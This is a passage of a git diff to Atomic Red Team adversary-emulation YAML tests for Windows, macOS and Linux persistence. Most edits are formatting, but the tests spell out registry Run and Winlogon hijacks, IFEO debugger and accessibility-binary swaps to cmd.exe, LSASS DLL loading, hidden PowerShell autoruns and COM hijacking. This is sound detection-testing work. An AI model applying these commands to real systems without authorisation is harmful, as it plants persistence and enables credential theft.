get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: command_prompt elevation_required: true @@ -58,29 +58,29 @@ atomic_tests: - name: Service Installation PowerShell auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 description: | - Installs A Local Service via PowerShell. - Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + Installs A Local Service via PowerShell. + Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. supported_platforms: - - windows + - windows input_arguments: binary_path: description: Name of the service binary, include path. - type: Path + type: path default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe service_name: description: Name of the Service - type: String + type: string default: AtomicTestService_PowerShell dependency_executor_name: powershell dependencies: - - description: | - Service binary must exist on disk at specified location (#{binary_path}) - prereq_command: | - if (Test-Path #{binary_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + - description: | + Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: | + if (Test-Path #{binary_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: powershell elevation_required: true @@ -95,7 +95,7 @@ atomic_tests: auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940 description: | It's running Dll as service to emulate the TinyTurla backdoor - + [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) supported_platforms: - windows diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml index ec89c31f..b347932c 100644 --- a/atomics/T1543.004/T1543.004.yaml +++ b/atomics/T1543.004/T1543.004.yaml @@ -6,15 +6,15 @@ atomic_tests: description: | Utilize LaunchDaemon to launch `Hello World` supported_platforms: - - macos + - macos input_arguments: plist_filename: - description: filename - type: String + description: filename + type: string default: com.atomicredteam.plist path_malicious_plist: description: Name of file to store in cron folder - type: String + type: string default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist dependency_executor_name: bash dependencies: diff --git a/atomics/T1546.001/T1546.001.yaml b/atomics/T1546.001/T1546.001.yaml index e1e51bd8..ecc67d43 100644 --- a/atomics/T1546.001/T1546.001.yaml +++ b/atomics/T1546.001/T1546.001.yaml @@ -12,22 +12,22 @@ atomic_tests: input_arguments: target_extension_handler: description: txtfile maps to notepad.exe - type: Path + type: path default: txtfile extension_to_change: description: File Extension To Hijack - type: String + type: string default: .hta #Adding additional input arguement below for new cleanup command original_extension_handler: - description: File Extension To Revert - type: String - default: htafile + description: File Extension To Revert + type: string + default: htafile executor: command: | assoc #{extension_to_change}=#{target_extension_handler} cleanup_command: | assoc #{extension_to_change}=#{original_extension_handler} - + name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1546.002/T1546.002.yaml b/atomics/T1546.002/T1546.002.yaml index 62d483bf..90a74480 100644 --- a/atomics/T1546.002/T1546.002.yaml +++ b/atomics/T1546.002/T1546.002.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: input_binary: description: Executable binary to use in place of screensaver for persistence - type: Path + type: path default: C:\Windows\System32\cmd.exe reboot: description: Set to non-zero value if you want the test to reboot the system so that changes take effect - type: Integer + type: integer default: 0 executor: command: | diff --git a/atomics/T1546.003/T1546.003.yaml b/atomics/T1546.003/T1546.003.yaml index 4ac3b12a..e57748e3 100644 --- a/atomics/T1546.003/T1546.003.yaml +++ b/atomics/T1546.003/T1546.003.yaml @@ -95,11 +95,11 @@ atomic_tests: input_arguments: mofcomp_path: description: Location of mofcomp.exe - type: String + type: string default: c:\windows\system32\wbem\mofcomp.exe mof_file: description: Local location MOF file - type: String + type: string default: PathToAtomicsFolder\T1546.003\src\T1546.003.mof dependency_executor_name: powershell dependencies: @@ -126,4 +126,4 @@ atomic_tests: $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1546.004/T1546.004.yaml b/atomics/T1546.004/T1546.004.yaml index 8ea1c9a6..fee325e0 100644 --- a/atomics/T1546.004/T1546.004.yaml +++ b/atomics/T1546.004/T1546.004.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: command_to_add: description: Command to add to the .bash_profile file - type: String + type: string default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004 executor: command: | @@ -30,7 +30,7 @@ atomic_tests: input_arguments: command_to_add: description: Command to add to the .bashrc file - type: String + type: string default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004 executor: command: | @@ -48,7 +48,7 @@ atomic_tests: input_arguments: text_to_append: description: Text to append to the /etc/profile file - type: String + type: string default: "# Hello from Atomic Red Team T1546.004" executor: elevation_required: true @@ -66,7 +66,7 @@ atomic_tests: input_arguments: text_to_append: description: Text to append to the ~/.profile file - type: String + type: string default: "# Atomic Red Team was here... T1546.004" executor: elevation_required: false @@ -75,7 +75,7 @@ atomic_tests: echo '#{text_to_append}' >> ~/.profile cleanup_command: | sed -i "s/# Atomic Red Team was here... T1546.004//" ~/.profile -- name: System shell profile scripts +- name: System shell profile scripts auto_generated_guid: 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 description: | An adversary may wish to establish persistence by adding commands into any of the script files in the /etc/profile.d/ directory, which are executed every time "any" user logs in. @@ -84,7 +84,7 @@ atomic_tests: input_arguments: text_to_append: description: Text to append to the /etc/profile.d/bash_completion.sh file - type: String + type: string default: "# Atomic Red Team was here... T1546.004" executor: elevation_required: true diff --git a/atomics/T1546.007/T1546.007.yaml b/atomics/T1546.007/T1546.007.yaml index 6de21710..4144c45e 100644 --- a/atomics/T1546.007/T1546.007.yaml +++ b/atomics/T1546.007/T1546.007.yaml @@ -6,7 +6,7 @@ atomic_tests: description: | You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. - + [Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) [Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) supported_platforms: @@ -14,7 +14,7 @@ atomic_tests: input_arguments: helper_file: description: Path to DLL - type: Path + type: path default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll dependency_executor_name: powershell dependencies: diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml index c50a3c0e..29c314dc 100644 --- a/atomics/T1546.008/T1546.008.yaml +++ b/atomics/T1546.008/T1546.008.yaml @@ -12,12 +12,12 @@ atomic_tests: parent_list: description: | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - type: String + type: string default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe attached_process: description: | Full path to process to attach to target in #{parent_list}. Default: cmd.exe - type: Path + type: path default: C:\windows\system32\cmd.exe executor: command: | diff --git a/atomics/T1546.009/T1546.009.yaml b/atomics/T1546.009/T1546.009.yaml index 0fac23fe..2db9a495 100644 --- a/atomics/T1546.009/T1546.009.yaml +++ b/atomics/T1546.009/T1546.009.yaml @@ -7,7 +7,7 @@ atomic_tests: Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key. Once the computer restarted, the DLL will be loaded in multiple processes and write an 'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully. - + Reference: https://skanthak.homepage.t-online.de/appcert.html supported_platforms: @@ -15,7 +15,7 @@ atomic_tests: input_arguments: dll_path: description: path of dll to use - type: Path + type: path default: PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll reboot: description: Set value to $true if you want to automatically reboot the machine @@ -23,13 +23,13 @@ atomic_tests: default: $false dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{dll_path}) - prereq_command: | - if (Test-Path #{dll_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll" -OutFile "#{dll_path}" + - description: | + File to copy must exist on disk at specified location (#{dll_path}) + prereq_command: | + if (Test-Path #{dll_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll" -OutFile "#{dll_path}" executor: command: | Copy-Item #{dll_path} C:\Users\Public\AtomicTest.dll -Force diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml index f5e70f99..ab1f8266 100644 --- a/atomics/T1546.010/T1546.010.yaml +++ b/atomics/T1546.010/T1546.010.yaml @@ -8,18 +8,18 @@ atomic_tests: you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. - + Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls supported_platforms: - windows input_arguments: registry_file: description: Windows Registry File - type: Path + type: path default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg registry_cleanup_file: description: Windows Registry File - type: Path + type: path default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg dependency_executor_name: powershell dependencies: diff --git a/atomics/T1546.011/T1546.011.yaml b/atomics/T1546.011/T1546.011.yaml index 86e3b425..adbb44e5 100644 --- a/atomics/T1546.011/T1546.011.yaml +++ b/atomics/T1546.011/T1546.011.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: file_path: description: Path to the shim database file - type: String + type: string default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb dependency_executor_name: powershell dependencies: @@ -75,4 +75,3 @@ atomic_tests: Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore name: powershell elevation_required: true - diff --git a/atomics/T1546.012/T1546.012.yaml b/atomics/T1546.012/T1546.012.yaml index 5ede0615..4713fe49 100644 --- a/atomics/T1546.012/T1546.012.yaml +++ b/atomics/T1546.012/T1546.012.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: target_binary: description: Binary To Attach To - type: Path + type: path default: calc.exe payload_binary: description: Binary To Execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -32,11 +32,11 @@ atomic_tests: input_arguments: target_binary: description: Binary To Attach To - type: Path + type: path default: notepad.exe payload_binary: description: Binary To Execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -61,12 +61,12 @@ atomic_tests: process: description: | Process to monitor - type: String + type: string default: whoami.exe cmd_to_run: description: | Command to execute - type: String + type: string default: cmd.exe /c calc.exe executor: command: | @@ -80,7 +80,7 @@ atomic_tests: $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}" New-Item -Path $SilentProcessExit -Force New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType DWord -Force - + $Name = "MonitorProcess" $Value = "#{cmd_to_run}" New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType String -Force @@ -91,4 +91,4 @@ atomic_tests: $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}" Remove-Item $registryPath -force name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1546.013/T1546.013.yaml b/atomics/T1546.013/T1546.013.yaml index 1b8cbfed..30756cfd 100644 --- a/atomics/T1546.013/T1546.013.yaml +++ b/atomics/T1546.013/T1546.013.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: exe_path: description: Path the malicious executable - type: Path + type: path default: calc.exe ps_profile: description: Powershell profile to use - type: String + type: string default: $profile dependency_executor_name: powershell dependencies: @@ -32,4 +32,4 @@ atomic_tests: cleanup_command: | $oldprofile = cat $profile | Select-Object -skiplast 1 Set-Content $profile -Value $oldprofile - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1546.014/T1546.014.yaml b/atomics/T1546.014/T1546.014.yaml index 5b3a5c64..65924d22 100644 --- a/atomics/T1546.014/T1546.014.yaml +++ b/atomics/T1546.014/T1546.014.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: plist: description: Path to attacker emond plist file - type: Path + type: path default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist executor: command: | diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index 0563e067..158c8e48 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -16,7 +16,7 @@ atomic_tests: default: Apartment dllpath: description: Path to the DLL. - type: String + type: string default: $env:TEMP\AtomicTest.dll clsid: description: Class ID to hijack. @@ -42,9 +42,9 @@ atomic_tests: name: powershell - name: Powershell Execute COM Object auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb - description: |- - Use the PowerShell to execute COM CLSID object. - Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ + description: |- + Use the PowerShell to execute COM CLSID object. + Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ supported_platforms: - windows executor: @@ -71,7 +71,7 @@ atomic_tests: default: Both dll_path: description: Path to the DLL. - type: String + type: string default: $env:temp\T1546.015_calc.dll clsid: description: Class ID to hijack. diff --git a/atomics/T1546/T1546.yaml b/atomics/T1546/T1546.yaml index 09e69b46..aaa6fd16 100644 --- a/atomics/T1546/T1546.yaml +++ b/atomics/T1546/T1546.yaml @@ -6,7 +6,7 @@ atomic_tests: auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b description: | The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. - + The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing. [Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/) supported_platforms: @@ -28,7 +28,7 @@ atomic_tests: elevation_required: true - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532 - description: |- + description: |- An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433) supported_platforms: @@ -39,7 +39,7 @@ atomic_tests: type: string default: notepad.exe executor: - command: |- + command: |- New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String" cleanup_command: |- Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore @@ -47,7 +47,7 @@ atomic_tests: elevation_required: true - name: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 - description: |- + description: |- An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433) supported_platforms: @@ -58,7 +58,7 @@ atomic_tests: type: string default: notepad.exe executor: - command: |- + command: |- $path = "HKCU:\Software\Microsoft\Command Processor" if (!(Test-Path -path $path)){ New-Item -ItemType Key -Path $path diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 6ae087f9..696b3681 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -12,7 +12,7 @@ atomic_tests: input_arguments: command_to_execute: description: Thing to Run - type: Path + type: path default: C:\Path\AtomicRedTeam.exe executor: command: | @@ -31,7 +31,7 @@ atomic_tests: input_arguments: thing_to_execute: description: Thing to Run - type: Path + type: path default: C:\Path\AtomicRedTeam.dll executor: command: | @@ -50,11 +50,11 @@ atomic_tests: input_arguments: thing_to_execute: description: Thing to Run - type: Path + type: path default: powershell.exe reg_key_path: description: Path to registry key to update - type: Path + type: path default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce executor: command: | @@ -122,7 +122,7 @@ atomic_tests: Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore name: powershell elevation_required: true - + - name: Add Executable Shortcut Link to User Startup Folder auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d description: 'Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. ' @@ -138,7 +138,7 @@ atomic_tests: $Create.Save() cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore name: powershell - elevation_required: true + elevation_required: true - name: Add persistance via Recycle bin auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f @@ -148,25 +148,25 @@ atomic_tests: supported_platforms: - windows executor: - command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f + command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f name: command_prompt - name: SystemBC Malware-as-a-Service Registry auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891 description: | - This Atomic will create a registry key called socks5_powershell for persistance access - https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c + This Atomic will create a registry key called socks5_powershell for persistance access + https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c supported_platforms: - windows input_arguments: reg_key_value: description: Thing to Run - type: Path + type: path default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File reg_key_path: description: Path to registry key to update - type: Path + type: path default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run executor: command: | @@ -175,7 +175,7 @@ atomic_tests: cleanup_command: | Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore name: powershell - + - name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value auto_generated_guid: acfef903-7662-447e-a391-9c91c2f00f7b description: | @@ -186,11 +186,11 @@ atomic_tests: input_arguments: new_startup_folder: description: new startup folder to replace standard one - type: String + type: string default: $env:TMP\atomictest\ payload: description: 'executable to be placed in new startup location ' - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | @@ -205,7 +205,7 @@ atomic_tests: - name: Change Startup Folder - HKCU Modify User Shell Folders Startup Value auto_generated_guid: 8834b65a-f808-4ece-ad7e-2acdf647aafa - description: | + description: | This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Startup" value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart supported_platforms: @@ -213,25 +213,25 @@ atomic_tests: input_arguments: new_startup_folder: description: new startup folder to replace standard one - type: String + type: string default: $env:TMP\atomictest\ payload: description: 'executable to be placed in new startup location ' - type: String + type: string default: C:\Windows\System32\calc.exe executor: - command: | - New-Item -ItemType Directory -path "#{new_startup_folder}" - Copy-Item -path "#{payload}" -destination "#{new_startup_folder}" - Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}" + command: | + New-Item -ItemType Directory -path "#{new_startup_folder}" + Copy-Item -path "#{payload}" -destination "#{new_startup_folder}" + Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}" cleanup_command: | - Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" - Remove-Item "#{new_startup_folder}" -Recurse -Force + Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" + Remove-Item "#{new_startup_folder}" -Recurse -Force name: powershell - name: HKCU - Policy Settings Explorer Run Key auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1 - description: | + description: | This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot. *Requires reboot supported_platforms: @@ -243,7 +243,7 @@ atomic_tests: default: atomictest payload: description: 'payload to execute' - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | @@ -257,7 +257,7 @@ atomic_tests: - name: HKLM - Policy Settings Explorer Run Key auto_generated_guid: b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f - description: | + description: | This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot. *Requires reboot supported_platforms: @@ -269,7 +269,7 @@ atomic_tests: default: atomictest payload: description: 'payload to execute' - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | @@ -283,7 +283,7 @@ atomic_tests: - name: HKLM - Append Command to Winlogon Userinit KEY Value auto_generated_guid: f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 - description: | + description: | This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot. * Requires reboot supported_platforms: @@ -291,7 +291,7 @@ atomic_tests: input_arguments: payload: description: what to run - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | @@ -308,7 +308,7 @@ atomic_tests: - name: 'HKLM - Modify default System Shell - Winlogon Shell KEY Value ' auto_generated_guid: 1d958c61-09c6-4d9e-b26b-4130314e520e - description: | + description: | This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from "explorer.exe" to the full path of "C:\Windows\explorer.exe" to log a change to the key's default value without breaking boot sequence. An atacker will alternatively replace this with a custom shell. @@ -317,7 +317,7 @@ atomic_tests: input_arguments: payload: description: what to run - type: String + type: string default: C:\Windows\explorer.exe executor: command: | @@ -333,7 +333,7 @@ atomic_tests: elevation_required: true - name: secedit used to create a Run key in the HKLM Hive auto_generated_guid: 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 - description: | + description: | secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive. [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d) supported_platforms: @@ -341,7 +341,7 @@ atomic_tests: input_arguments: ini_file: description: INI config template - type: String + type: string default: $PathToAtomicsFolder\T1547.001\src\regtemplate.ini secedit_db: description: Custom secedit db diff --git a/atomics/T1547.004/T1547.004.yaml b/atomics/T1547.004/T1547.004.yaml index 79757b40..a4a6ee97 100644 --- a/atomics/T1547.004/T1547.004.yaml +++ b/atomics/T1547.004/T1547.004.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: binary_to_execute: description: Path of binary to execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -21,7 +21,7 @@ atomic_tests: cleanup_command: | Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore name: powershell - + - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb description: | @@ -33,7 +33,7 @@ atomic_tests: input_arguments: binary_to_execute: description: Path of binary to execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -53,7 +53,7 @@ atomic_tests: input_arguments: binary_to_execute: description: Path of notification package to execute - type: Path + type: path default: C:\Windows\Temp\atomicNotificationPackage.dll executor: command: | @@ -74,7 +74,7 @@ atomic_tests: input_arguments: binary_to_execute: description: Path of binary to execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -82,7 +82,7 @@ atomic_tests: cleanup_command: | Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore name: powershell - + - name: Winlogon HKLM Userinit Key Persistence - PowerShell auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b description: | @@ -94,7 +94,7 @@ atomic_tests: input_arguments: binary_to_execute: description: Path of binary to execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | diff --git a/atomics/T1547.005/T1547.005.yaml b/atomics/T1547.005/T1547.005.yaml index 2efa415b..00c0ac3a 100644 --- a/atomics/T1547.005/T1547.005.yaml +++ b/atomics/T1547.005/T1547.005.yaml @@ -9,7 +9,7 @@ atomic_tests: input_arguments: fake_ssp_dll: description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. - type: String + type: string default: not-a-ssp executor: command: | @@ -22,4 +22,4 @@ atomic_tests: # revert (before reboot) Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1547.006/T1547.006.yaml b/atomics/T1547.006/T1547.006.yaml index 4c9ddd28..f6809254 100644 --- a/atomics/T1547.006/T1547.006.yaml +++ b/atomics/T1547.006/T1547.006.yaml @@ -10,19 +10,19 @@ atomic_tests: input_arguments: module_name: description: Name of the kernel module name. - type: String + type: string default: T1547006 module_path: description: Folder used to store the module. - type: Path + type: path default: /tmp/T1547.006/T1547006.ko temp_folder: description: Temp folder used to compile the code. - type: Path + type: path default: /tmp/T1547.006 module_source_path: description: Path to download Gsecdump binary file - type: Url + type: url default: PathToAtomicsFolder/T1547.006/src dependency_executor_name: bash dependencies: @@ -52,7 +52,7 @@ atomic_tests: input_arguments: module_path: description: Folder used to store the module. - type: Path + type: path default: /Library/Extensions/SoftRAID.kext dependency_executor_name: bash dependencies: @@ -83,11 +83,11 @@ atomic_tests: input_arguments: src_path: description: Folder used to store the module. - type: Path + type: path default: PathToAtomicsFolder/T1547.006/src/macos_kextload.c exe_path: description: Folder used to store the module. - type: Path + type: path default: /tmp/T1547006_iokit_loader dependency_executor_name: bash dependencies: diff --git a/atomics/T1547.007/T1547.007.yaml b/atomics/T1547.007/T1547.007.yaml index 2c8af95e..3a6f4ae1 100644 --- a/atomics/T1547.007/T1547.007.yaml +++ b/atomics/T1547.007/T1547.007.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: calc_plist_path: description: path to binary plist with entry to open calculator - type: Path + type: path default: PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist executor: command: | @@ -29,7 +29,7 @@ atomic_tests: input_arguments: script: description: path to script - type: Path + type: path default: /path/to/script executor: command: | @@ -49,20 +49,20 @@ atomic_tests: input_arguments: objc_source_path: description: path to objective C program - type: Path + type: path default: PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m exe_path: description: path to compiled program - type: Path + type: path default: /tmp/t1547007_append_exe dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi - get_prereq_command: | - cc #{objc_source_path} -o #{exe_path} -framework Cocoa + - description: | + compile C program + prereq_command: | + if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi + get_prereq_command: | + cc #{objc_source_path} -o #{exe_path} -framework Cocoa executor: command: | FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1` diff --git a/atomics/T1547.008/T1547.008.yaml b/atomics/T1547.008/T1547.008.yaml index 9a1627b5..624a5d02 100644 --- a/atomics/T1547.008/T1547.008.yaml +++ b/atomics/T1547.008/T1547.008.yaml @@ -5,7 +5,7 @@ atomic_tests: auto_generated_guid: 8ecef16d-d289-46b4-917b-0dba6dc81cf1 description: | The following Atomic will modify an undocumented registry key that may be abused to load a arbitrary DLL into LSASS. - + Upon execution, the registry key will be modified and a value will contain the path to the DLL. Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL. @@ -14,7 +14,7 @@ atomic_tests: input_arguments: dll_path: description: Module to be loaded into LSASS - type: Path + type: path default: '$env:TEMP\lsass_lib.dll' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1547.009/T1547.009.yaml b/atomics/T1547.009/T1547.009.yaml index 